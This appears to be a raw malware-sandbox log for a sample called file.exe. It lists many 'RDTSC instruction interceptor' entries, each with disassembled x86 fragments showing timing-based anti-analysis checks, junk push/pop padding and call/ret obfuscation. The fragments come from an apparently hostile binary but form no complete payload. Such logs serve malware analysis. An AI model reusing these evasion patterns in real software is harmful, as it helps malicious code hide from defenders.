Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93CEE6 second address: 93CEEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93CEEC second address: 93CF8D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB7D50A5EDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c jmp 00007FB7D50A5EE6h 0x00000011 pop eax 0x00000012 nop 0x00000013 push edx 0x00000014 movsx edi, cx 0x00000017 pop edi 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FB7D50A5ED8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 mov bx, 3475h 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 jl 00007FB7D50A5EF0h 0x0000004a call 00007FB7D50A5EE3h 0x0000004f mov dword ptr [ebp+122D2518h], esi 0x00000055 pop edi 0x00000056 mov bx, si 0x00000059 mov eax, dword ptr [ebp+122D02CDh] 0x0000005f mov ebx, dword ptr [ebp+122D32A1h] 0x00000065 clc 0x00000066 push FFFFFFFFh 0x00000068 sub dword ptr [ebp+1245946Eh], edx 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 push edx 0x00000072 push ebx 0x00000073 pop ebx 0x00000074 pop edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93CF8D second address: 93CF92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93EF19 second address: 93EF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D8FED second address: 8D8FF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D8FF3 second address: 8D9005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D9005 second address: 8D9009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9483F6 second address: 9483FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947C6D second address: 947C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FB7D509B846h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947C7A second address: 947C80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947C80 second address: 947C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB7D509B855h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947C9D second address: 947CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94B3AA second address: 94B3B8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 952391 second address: 952395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9510E6 second address: 9510EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9510EE second address: 951112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FB7D50A5EEFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951112 second address: 95114B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB7D509B85Ah 0x00000008 jmp 00007FB7D509B854h 0x0000000d push edx 0x0000000e jmp 00007FB7D509B854h 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95114B second address: 951150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951150 second address: 951156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95180A second address: 951819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FB7D50A5ED6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951ADF second address: 951AE5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951AE5 second address: 951AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951AF2 second address: 951AFE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007FB7D509B846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951AFE second address: 951B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB7D50A5EE1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951C60 second address: 951C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951C64 second address: 951CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB7D50A5ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pop esi 0x00000013 pushad 0x00000014 jg 00007FB7D50A5ED8h 0x0000001a pushad 0x0000001b popad 0x0000001c jl 00007FB7D50A5EE9h 0x00000022 jmp 00007FB7D50A5EE1h 0x00000027 push edi 0x00000028 pop edi 0x00000029 push eax 0x0000002a pushad 0x0000002b popad 0x0000002c js 00007FB7D50A5ED6h 0x00000032 pop eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951CA7 second address: 951CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB7D509B846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951E4A second address: 951E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95508F second address: 95509C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FB7D509B846h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95509C second address: 9550C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB7D50A5ED6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FB7D50A5EE3h 0x00000011 pushad 0x00000012 popad 0x00000013 jne 00007FB7D50A5ED6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9598C4 second address: 959914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB7D509B857h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FB7D509B856h 0x00000011 pushad 0x00000012 jmp 00007FB7D509B859h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 959A6C second address: 959A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 959EB0 second address: 959EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 959EB6 second address: 959EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 959EBF second address: 959EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 959EC4 second address: 959ED3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDAh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 959ED3 second address: 959ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A01A second address: 95A036 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB7D50A5ED6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007FB7D50A5EDDh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A1A6 second address: 95A1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B855h 0x00000009 popad 0x0000000a ja 00007FB7D509B862h 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FB7D509B846h 0x00000018 jmp 00007FB7D509B84Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A33B second address: 95A341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95AA98 second address: 95AA9E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95AA9E second address: 95AAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB7D50A5ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95AAA8 second address: 95AAAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 959310 second address: 959329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jne 00007FB7D50A5ED6h 0x0000000e pop ebx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FB7D50A5ED6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 959329 second address: 95932D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95932D second address: 959333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 959333 second address: 959352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FB7D509B851h 0x0000000c jl 00007FB7D509B84Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95F712 second address: 95F71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007FB7D50A5ED8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DDF37 second address: 8DDF3C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DDF3C second address: 8DDF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB7D50A5EE9h 0x0000000f js 00007FB7D50A5ED6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DDF67 second address: 8DDF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DDF6D second address: 8DDF72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 920BCF second address: 909090 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB7D509B848h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D32E0h], esi 0x00000015 lea eax, dword ptr [ebp+1248593Ah] 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FB7D509B848h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 xor dword ptr [ebp+122D36CFh], edx 0x0000003b or edi, 4D11FB41h 0x00000041 nop 0x00000042 pushad 0x00000043 jmp 00007FB7D509B855h 0x00000048 ja 00007FB7D509B848h 0x0000004e popad 0x0000004f push eax 0x00000050 jmp 00007FB7D509B853h 0x00000055 nop 0x00000056 or cl, 0000004Fh 0x00000059 call dword ptr [ebp+122D3497h] 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FB7D509B84Ch 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 920E03 second address: 920E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9210EB second address: 9210EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9210EF second address: 9210F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9211C3 second address: 9211D5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9211D5 second address: 9211DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9211DA second address: 92127D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnl 00007FB7D509B859h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FB7D509B84Ah 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007FB7D509B84Ah 0x00000021 pop eax 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007FB7D509B848h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c mov edi, dword ptr [ebp+122D2518h] 0x00000042 call 00007FB7D509B849h 0x00000047 jc 00007FB7D509B852h 0x0000004d push esi 0x0000004e jmp 00007FB7D509B84Ah 0x00000053 pop esi 0x00000054 push eax 0x00000055 jmp 00007FB7D509B858h 0x0000005a mov eax, dword ptr [esp+04h] 0x0000005e je 00007FB7D509B84Eh 0x00000064 push ecx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92127D second address: 9212B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [eax] 0x00000007 jns 00007FB7D50A5EE4h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB7D50A5EE8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 921406 second address: 921410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB7D509B846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 921410 second address: 921465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnl 00007FB7D50A5EDAh 0x00000012 xchg eax, esi 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FB7D50A5ED8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D3428h], ecx 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 jl 00007FB7D50A5ED8h 0x0000003c push edi 0x0000003d pop edi 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 921E19 second address: 921E4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007FB7D509B846h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 jns 00007FB7D509B848h 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB7D509B858h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 921F49 second address: 921F71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c jo 00007FB7D50A5ED6h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB7D50A5EDCh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E92B second address: 95E943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B850h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E943 second address: 95E949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E949 second address: 95E94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E94D second address: 95E97C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007FB7D50A5EE3h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E97C second address: 95E982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95EDC5 second address: 95EDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB7D50A5ED6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jbe 00007FB7D50A5ED6h 0x00000014 jnl 00007FB7D50A5ED6h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95F061 second address: 95F07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FB7D509B84Bh 0x0000000b jmp 00007FB7D509B84Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95F07C second address: 95F080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2F4D second address: 8E2F75 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB7D509B85Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2F75 second address: 8E2F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2F7B second address: 8E2F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FB7D509B848h 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2F88 second address: 8E2F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2F8F second address: 8E2FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB7D509B84Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2FA7 second address: 8E2FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9693C6 second address: 9693D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9693D4 second address: 9693D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9693D8 second address: 9693FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB7D509B84Bh 0x0000000d jmp 00007FB7D509B854h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9693FF second address: 969403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96952C second address: 96954C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007FB7D509B846h 0x00000010 jp 00007FB7D509B846h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96911E second address: 969122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E43B second address: 96E43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E43F second address: 96E44C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
